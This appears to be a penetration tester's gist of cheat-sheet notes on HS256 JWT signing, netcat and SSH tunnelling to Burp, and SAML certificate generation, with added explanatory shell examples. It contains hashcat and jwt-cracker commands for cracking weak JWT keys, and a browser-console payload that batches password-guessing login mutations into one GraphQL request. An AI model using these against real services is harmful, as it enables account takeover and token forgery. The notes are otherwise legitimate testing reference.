Sathish Kumar sathishshan

View GitHub Profile
HS256 - Signature:
echo -n "<JWT Base64url encoded - Header.Payload>" | openssl dgst -sha256 -hmac '<SECRET>' -binary | openssl base64
The output is standard base64; convert it to base64url before using it as the signature segment, e.g.:
SZf1eovdqV+1mo8rvI79UxQT3Ue/mJd3ipXu8XO01os=
Change + to -, / to _, and omit the padding (== or =)
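The same HS256 steps as POSIX shell functions, added here as an example (not code from the gist): openssl produces the HMAC, tr does the base64 to base64url conversion, and a verify function recomputes the signature over the token's header.payload so a token minted with one secret can be checked against another. The header, payload and secret values are constructed test inputs.

```shell
#!/bin/sh
# Added example: HS256 JWT signing/verification with openssl.
# All values used below are constructed test inputs, not real secrets.

# hs256_hex MESSAGE SECRET -> raw HMAC-SHA256 as lowercase hex
# (handy for checking against published HMAC test vectors)
hs256_hex() {
    printf '%s' "$1" | openssl dgst -sha256 -hmac "$2" -binary \
        | od -An -tx1 | tr -d ' \n'
}

# stdin bytes -> base64url without padding (+ to -, / to _, drop =)
b64url_encode() {
    openssl base64 -A | tr -- '+/' '-_' | tr -d '='
}

# stdin base64url -> raw bytes; re-adds the padding openssl expects
b64url_decode() {
    s=$(tr -- '-_' '+/')
    case $(( ${#s} % 4 )) in
        2) s="${s}==" ;;
        3) s="${s}=" ;;
    esac
    printf '%s' "$s" | openssl base64 -d -A
}

# hs256_signature SIGNING_INPUT SECRET -> signature segment of the JWT,
# where SIGNING_INPUT is base64url(header).base64url(payload)
hs256_signature() {
    printf '%s' "$1" | openssl dgst -sha256 -hmac "$2" -binary | b64url_encode
}

# make_hs256_jwt HEADER_JSON PAYLOAD_JSON SECRET -> compact JWT
make_hs256_jwt() {
    h=$(printf '%s' "$1" | b64url_encode)
    p=$(printf '%s' "$2" | b64url_encode)
    printf '%s.%s.%s' "$h" "$p" "$(hs256_signature "$h.$p" "$3")"
}

# verify_hs256_jwt TOKEN SECRET -> exit 0 if the signature matches SECRET.
# Diagnostic only: a real verifier also checks alg/exp/aud and compares
# in constant time, which a shell string comparison does not.
verify_hs256_jwt() {
    tok=$1
    signing_input=${tok%.*}
    given=${tok##*.}
    expected=$(hs256_signature "$signing_input" "$2")
    [ -n "$given" ] && [ "$given" = "$expected" ]
}

# Demo run with constructed values
demo_token=$(make_hs256_jwt '{"alg":"HS256","typ":"JWT"}' \
    '{"sub":"1234567890","name":"test"}' 'your-256-bit-secret')
printf '%s\n' "$demo_token"
verify_hs256_jwt "$demo_token" 'your-256-bit-secret' && printf 'signature ok\n'
```

The functions avoid `echo -n`, whose behaviour varies between shells, and pass `--` to `tr` so that a set beginning with `-` is not parsed as an option.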
HS256 - Weak Signing Key: Brute Force
hashcat -a 0 -m 16500 <JWT TOKEN> /path/to/jwt.secrets.list
npm install jwt-cracker
jwt-cracker <token> [<alphabet>] [<maxLength>]
HS256 - Extracting Public Key from JWT token:
https://github.com/silentsignal/rsa_sign2n/tree/release/standalone
// Browser-console snippet: builds one GraphQL document containing an aliased
// login mutation per candidate password and copies it to the clipboard.
copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element, index) => `
bruteforce$index:login(input:{password: "$password", username: "<USERNAME>"}) {
  token
  success
}
`.replaceAll('$index', index).replaceAll('$password', element)).join('\n'));
console.log("The query has been copied to the clipboard");
while true; do nc -l localhost 8888; done
curl localhost:8888
curl -F '<field>=@<file>' -F '<field2>=@<file2>' localhost:8888
Remote Traffic to Localhost -> Ex: Curl to Burp
Tunnel Establishment:
ssh -fNT -R 8080:localhost:8080 username@IP
Test Run:
curl -svk https://www.google.com -x http://localhost:8080
-----------------------------------------------------------------------------------
Generate a certificate for the SAML app
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt
Refs:
https://faq.miniorange.com/knowledgebase/can-generate-certificate-saml-app/
https://stackoverflow.com/questions/48397927/where-to-get-a-saml-certificate
https://www.samltool.com/self_signed_certs.php
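The certificate command above, wrapped as an added example (not code from the gist or the linked references) so it runs non-interactively, followed by the checks worth doing before handing the certificate to an IdP: that the key and certificate belong together, that the validity window is what you expect, and the SHA-256 fingerprint to compare with what the IdP displays. The output directory, CN and lifetime are assumed values.

```shell
#!/bin/sh
# Added example: generate and sanity-check a self-signed SAML signing cert.
# Directory, CN and day count are constructed values.

# gen_saml_cert DIR CN [DAYS]: RSA-2048/SHA-256 self-signed cert plus an
# unencrypted private key (-nodes), written as privateKey.key / certificate.crt
gen_saml_cert() {
    dir=$1; cn=$2; days=${3:-365}
    openssl req -x509 -sha256 -nodes -days "$days" -newkey rsa:2048 \
        -subj "/CN=$cn" \
        -keyout "$dir/privateKey.key" -out "$dir/certificate.crt"
}

# cert_matches_key DIR: exit 0 when the public key embedded in the cert is the
# one derived from the private key (catches mismatched key/cert pairs)
cert_matches_key() {
    c=$(openssl x509 -in "$1/certificate.crt" -noout -pubkey | openssl dgst -sha256)
    k=$(openssl pkey -in "$1/privateKey.key" -pubout | openssl dgst -sha256)
    [ -n "$c" ] && [ "$c" = "$k" ]
}

# cert_valid_for_days DIR N: exit 0 when the cert will not expire within N days
cert_valid_for_days() {
    openssl x509 -in "$1/certificate.crt" -noout -checkend $(( $2 * 86400 )) >/dev/null
}

# cert_sha256_fingerprint DIR: colon-separated SHA-256 fingerprint
cert_sha256_fingerprint() {
    openssl x509 -in "$1/certificate.crt" -noout -fingerprint -sha256 | cut -d= -f2
}

# Demo run in a temporary directory
out=$(mktemp -d)
gen_saml_cert "$out" sso.example.test 365
cert_matches_key "$out" && printf 'key and certificate match\n'
cert_valid_for_days "$out" 30 && printf 'valid for at least 30 days\n'
printf 'SHA256 fingerprint: %s\n' "$(cert_sha256_fingerprint "$out")"
```

Because the key is written unencrypted, keep it out of the repository and restrict its permissions; only certificate.crt is uploaded to the IdP.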